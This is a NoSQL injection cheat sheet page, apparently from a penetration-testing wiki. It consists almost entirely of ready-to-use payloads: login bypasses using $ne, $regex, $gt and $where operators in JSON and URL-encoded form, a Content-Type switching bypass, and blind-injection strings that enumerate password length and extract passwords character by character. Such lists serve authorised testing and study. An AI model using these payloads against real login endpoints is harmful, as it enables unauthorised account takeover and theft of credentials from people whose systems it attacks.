search
githubEdit

syringeNoSQL Injection

chevron-rightAuthentication Bypasshashtag
Bypass by checking both fields exist
{"username": {"$ne": null}, "password": {"$ne": null}}
Bypass using regex wildcard to match any value
{"username": {"$regex": ".*"}, "password": {"$regex": ".*"}}
Bypass for known username, password greater than empty string
{"username": "admin", "password": {"$gt": ""}}
circle-info

URL-encoded bypasses

URL-encoded version of null check bypass
username[$ne]=null&password[$ne]=null
URL-encoded regex wildcard bypass
username[$regex]=.*&password[$regex]=.*
chevron-rightNoSQL Login Bypass by Content-Type Switchhashtag

With Content-Type: application/x-www-form-urlencoded try:

URL-Encoded
user=admin&password[$ne]=wrongpassword

Otherwise, set the Content-Type to application/json on the POST request:B

JSON
{"user": "admin", "password": {"$ne": "wrongpassword"}}
chevron-rightJSON injection in web formshashtag
Both fields not equal to empty string
{"username": {"$ne": ""}, "password": {"$ne": ""}}
$where clause always evaluates to true
{"$where": "this.username == this.username"}
chevron-rightBlind NoSQL injectionhashtag
circle-info

Length enumeration

{"username": "admin", "password": {"$regex": ".{1}"}}
{"username": "admin", "password": {"$regex": ".{2}"}}
circle-info

Character-by-character extraction

{"username": "admin", "password": {"$regex": "^a.*"}}
{"username": "admin", "password": {"$regex": "^ad.*"}}
PreviousSQLite InjectionNextJavaScript Type Coercion in Validation Logic

Last updated